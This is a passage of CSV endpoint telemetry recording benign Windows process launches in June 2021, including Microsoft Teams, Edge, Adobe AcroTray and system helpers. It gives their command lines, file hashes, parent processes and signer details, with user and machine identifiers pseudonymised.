01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1252,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:41.205717400+00:00,16484,Teams.exe,"""Teams.exe"" --checkInstall --source=PROPLUS",PortableExecutable,2020-09-16 12:13:44+00:00,C:\Program Files (x86)\Teams Installer\Teams.exe,101284632,5c86e37766dd71f7bc27477cd057496f,c302f8d223cec2af255b1dd896a3cf0da1aaaf1d8b4ce5dae59be8de9daead44,bffdd972ad367a9922aac5e0999884446891cc9f,7430ccc7226a6ff76b6d55b96f6ce53c,0babaeacf9d0aa4e6fbea6943b9916425746fb702b6501c47f4470fd195836af,49b01fd1a1590320332c8c766c098bae6b1c01dd,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:40.825938100+00:00,19368,runonce.exe,runonce.exe /Run6432,False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:41.240604600+00:00,2021-06-23 00:52:50.749064500+00:00,46be66ef-9687-4b84-a274-3ab19b3fe31f,computerpii_0a470890c60768167990033d701e7bd881398861,154766,False,10.7740.19041.1052,False,11540474045171821,,11540474045171825,2021-06-23 00:51:40.825938100+00:00,19368,2021-06-23 00:51:40.825938100+00:00,\Device\HarddiskVolume3\Windows\SysWOW64\runonce.exe,19368,18560,ActiveProcessStartkey,C:\Windows\SysWOW64,47104,1994-09-12 02:37:52+00:00,2021-02-17 04:35:32.236243+00:00,2021-06-23 00:51:40.830274800+00:00,2021-02-17 04:35:32.235216+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,RunOnce,RUNONCE.EXE,Run Once Wrapper,Microsoft Corporation,Microsoft Teams,1.3.00.26064,Setup.exe,Setup.exe,Microsoft Teams
+1253,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:41.237814600+00:00,13216,CompPkgSrv.exe,CompPkgSrv.exe -Embedding,PortableExecutable,2021-02-17 04:34:40.332052600+00:00,C:\Windows\System32\CompPkgSrv.exe,214528,ceff6949f934d465db8f19b07e81ac78,34d5f40785a62bb26b49976212cce6673bf0cca04f50038626c704236f497e13,a4a1673048b1cdd49a1862f5c384af028e8ced07,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:41.290985700+00:00,2021-06-23 00:52:50.749097+00:00,8cae60d2-6033-48ea-912d-2b2fb985e2e5,computerpii_0a470890c60768167990033d701e7bd881398861,154767,False,10.7740.19041.1052,False,11540474045136908,,11540474045171826,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,Component Package Support Server,CompPkgSrv.exe,Component Package Support Server
+1254,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:41.281286900+00:00,1292,acrotray.exe,"""acrotray.exe"" ",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\acrotray.exe,5296352,73d9fdd6ba9f5634ce8ab8b1f54abbd9,ee19864aa66a2dee5fcefa1f298498d8244b021294f2000a6e702b9e17ebddc1,20002f924780ab3595dd8c307e785ad429b4512c,7430ccc7226a6ff76b6d55b96f6ce53c,0babaeacf9d0aa4e6fbea6943b9916425746fb702b6501c47f4470fd195836af,49b01fd1a1590320332c8c766c098bae6b1c01dd,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:40.825938100+00:00,19368,runonce.exe,runonce.exe /Run6432,False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:41.320400200+00:00,2021-06-23 00:52:50.749172400+00:00,84120b5f-2dfd-4778-b7b1-ffa641c0be22,computerpii_0a470890c60768167990033d701e7bd881398861,154769,False,10.7740.19041.1052,False,11540474045171821,,11540474045171827,2021-06-23 00:51:40.825938100+00:00,19368,2021-06-23 00:51:40.825938100+00:00,\Device\HarddiskVolume3\Windows\SysWOW64\runonce.exe,19368,128,ActiveProcessStartkey,C:\Windows\SysWOW64,47104,1994-09-12 02:37:52+00:00,2021-02-17 04:35:32.236243+00:00,2021-06-23 00:51:40.830274800+00:00,2021-02-17 04:35:32.235216+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,1.0,1.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,RunOnce,RUNONCE.EXE,Run Once Wrapper,Adobe Systems Inc.,AcroTray - Adobe Acrobat Distiller helper application.,21.5.20048.436468,AcroTray,AcroTray.exe,AcroTray
+1255,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:41.326325700+00:00,1436,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,6404088009311199867,3082750514405554529,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --enable-sandbox --native-window-open --preload=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar\lib\renderer\notifications\FilePII_e9b204e348814796c2a61feffc49c5ba27a5f5d5.js"" --background-color=#fff --enable-websql --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2868 /prefetch:1 --msteams-process-type=notificationsManager",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-23 00:51:38.356200500+00:00,14744,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:41.381459900+00:00,2021-06-23 00:52:50.749346300+00:00,dc3776d8-4118-4a02-9b71-0c8d4f4d9955,computerpii_0a470890c60768167990033d701e7bd881398861,154774,False,10.7740.19041.1052,False,11540474045171817,,11540474045171828,2021-06-23 00:51:39.754689300+00:00,1564,2021-06-23 00:51:39.754689300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1564,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1256,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:41.722022400+00:00,20040,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,6404088009311199867,3082750514405554529,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --webview-tag --enable-sandbox --native-window-open --preload=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar\lib\renderer\FilePII_88702fd66fe3a1d7874360abd7c4f15c0cdd6a77.js"" --background-color=#fff --enable-websql --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1200 /prefetch:1 --msteams-process-type=main-renderer --msteams-rendererid=main-renderer",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-23 00:51:38.356200500+00:00,14744,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:41.770606700+00:00,2021-06-23 00:52:50.749821400+00:00,0a49b82a-88f4-4e2a-ba81-2f612f8d6d07,computerpii_0a470890c60768167990033d701e7bd881398861,154788,False,10.7740.19041.1052,False,11540474045171817,,11540474045171830,2021-06-23 00:51:39.754689300+00:00,1564,2021-06-23 00:51:39.754689300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1564,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1257,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:41.912374500+00:00,11660,Teams.exe,"""Teams.exe"" --type=utility --field-trial-handle=1776,6404088009311199867,3082750514405554529,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=audio --enable-wer --ms-teams-less-cors=522133263 --electron-shared-settings=eyJ********** --mojo-platform-channel-handle=3576 /prefetch:8",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-23 00:51:38.356200500+00:00,14744,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:42.025495200+00:00,2021-06-23 00:52:50.750094+00:00,13cc246f-6bf5-4b21-b719-fcd7b170d37c,computerpii_0a470890c60768167990033d701e7bd881398861,154795,False,10.7740.19041.1052,False,11540474045171817,,11540474045171832,2021-06-23 00:51:39.754689300+00:00,1564,2021-06-23 00:51:39.754689300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1564,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1258,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:42.161488900+00:00,2021-06-23 00:52:50.750593400+00:00,989a62cd-8f27-4daa-b04c-50473fa35ef6,computerpii_0a470890c60768167990033d701e7bd881398861,154809,False,10.7740.19041.1052,False,11540474045171770,,11540474045171833,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-23 00:51:19.951048300+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,11452,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,1.0,3073.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1259,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:42.093460100+00:00,18360,msedge.exe,"""msedge.exe"" --type=crashpad-handler ""--user-data-dir=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Edge\User Data"" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler ""--database=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Edge\User Data\Crashpad"" ""--metrics-dir=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Edge\User Data"" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=91.0.4472.114 ""--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"" --annotation=plat=Win64 ""--annotation=prod=Microsoft Edge"" --annotation=ver=91.0.864.54 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffbde0806f8,0x7ffbde080708,0x7ffbde080718",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:42.239311800+00:00,2021-06-23 00:52:50.750628+00:00,613fe9f6-8f4a-4f7c-9d39-74c91866b280,computerpii_0a470890c60768167990033d701e7bd881398861,154810,False,10.7740.19041.1052,False,11540474045171833,,11540474045171834,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,256.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1260,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:42.712556600+00:00,17480,msedge.exe,"""msedge.exe"" --type=gpu-process --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2120 /prefetch:2",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:43.013346900+00:00,2021-06-23 00:52:50.751170300+00:00,efecd7f7-9101-4dd4-8d1c-4218c2fbf47d,computerpii_0a470890c60768167990033d701e7bd881398861,154827,False,10.7740.19041.1052,False,11540474045171833,,11540474045171835,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 